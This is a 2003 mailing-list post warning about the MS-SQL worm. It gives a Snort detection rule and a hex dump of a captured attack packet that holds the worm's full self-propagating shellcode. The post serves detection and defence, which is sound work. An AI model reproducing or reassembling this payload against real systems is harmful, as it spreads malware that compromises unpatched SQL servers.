[ale] New worm destablized Internet

Jonathan Rickman jonathan at xcorps.net
Sat Jan 25 22:03:44 EST 2003


For those interested in such things...



Snort Rule to detect SQL Worm:

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm
Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown;
sid:9994; rev:1;)


Packet capture from actual attack:

0: 0003 ba0b e48d 0050 7343 a257 0800 4500 .......PsC.W..E.
16: 0194 00f2 0000 6d11 d101 da39 813a c331 ......m....9.:.1
32: 42d1 10c8 059a 0180 aa1d 0401 0101 0101 B...............
48: 0101 0101 0101 0101 0101 0101 0101 0101 ................
64: 0101 0101 0101 0101 0101 0101 0101 0101 ................
80: 0101 0101 0101 0101 0101 0101 0101 0101 ................
96: 0101 0101 0101 0101 0101 0101 0101 0101 ................
112: 0101 0101 0101 0101 0101 0101 0101 0101 ................
128: 0101 0101 0101 0101 0101 01dc c9b0 42eb ..............B.
144: 0e01 0101 0101 0101 70ae 4201 70ae 4290 ........p.B.p.B.
160: 9090 9090 9090 9068 dcc9 b042 b801 0101 .......h...B....
176: 0131 c9b1 1850 e2fd 3501 0101 0550 89e5 .1...P.5....P..
192: 5168 2e64 6c6c 6865 6c33 3268 6b65 726e Qh.dllhel32hkern
208: 5168 6f75 6e74 6869 636b 4368 4765 7454 QhounthickChGetT
224: 66b9 6c6c 5168 3332 2e64 6877 7332 5f66 f.llQh32.dhws2_f
240: b965 7451 6873 6f63 6b66 b974 6f51 6873 .etQhsockf.toQhs
256: 656e 64be 1810 ae42 8d45 d450 ff16 508d end....B.E.P..P.
272: 45e0 508d 45f0 50ff 1650 be10 10ae 428b E.P.E.P..P....B.
288: 1e8b 033d 558b ec51 7405 be1c 10ae 42ff ...=U..Qt.....B.
304: 16ff d031 c951 5150 81f1 0301 049b 81f1 ...1.QQP........
320: 0101 0101 518d 45cc 508b 45c0 50ff 166a ....Q.E.P.E.P..j
336: 116a 026a 02ff d050 8d45 c450 8b45 c050 .j.j...P.E.P.E.P
352: ff16 89c6 09db 81f3 3c61 d9ff 8b45 b48d ........<a...E..
368: 0c40 8d14 88c1 e204 01c2 c1e2 0829 c28d . at ...........)..
384: 0490 01d8 8945 b46a 108d 45b0 5031 c951 .....E.j..E.P1.Q
400: 6681 f178 0151 8d45 0350 8b45 ac50 ffd6 f..x.Q.E.P.E.P..
416: ebca ..


--
Jonathan Rickman
X Corps Security
http://www.xcorps.net

_______________________________________________
Ale mailing list
Ale at ale.org
http://www.ale.org/mailman/listinfo/ale






More information about the Ale mailing list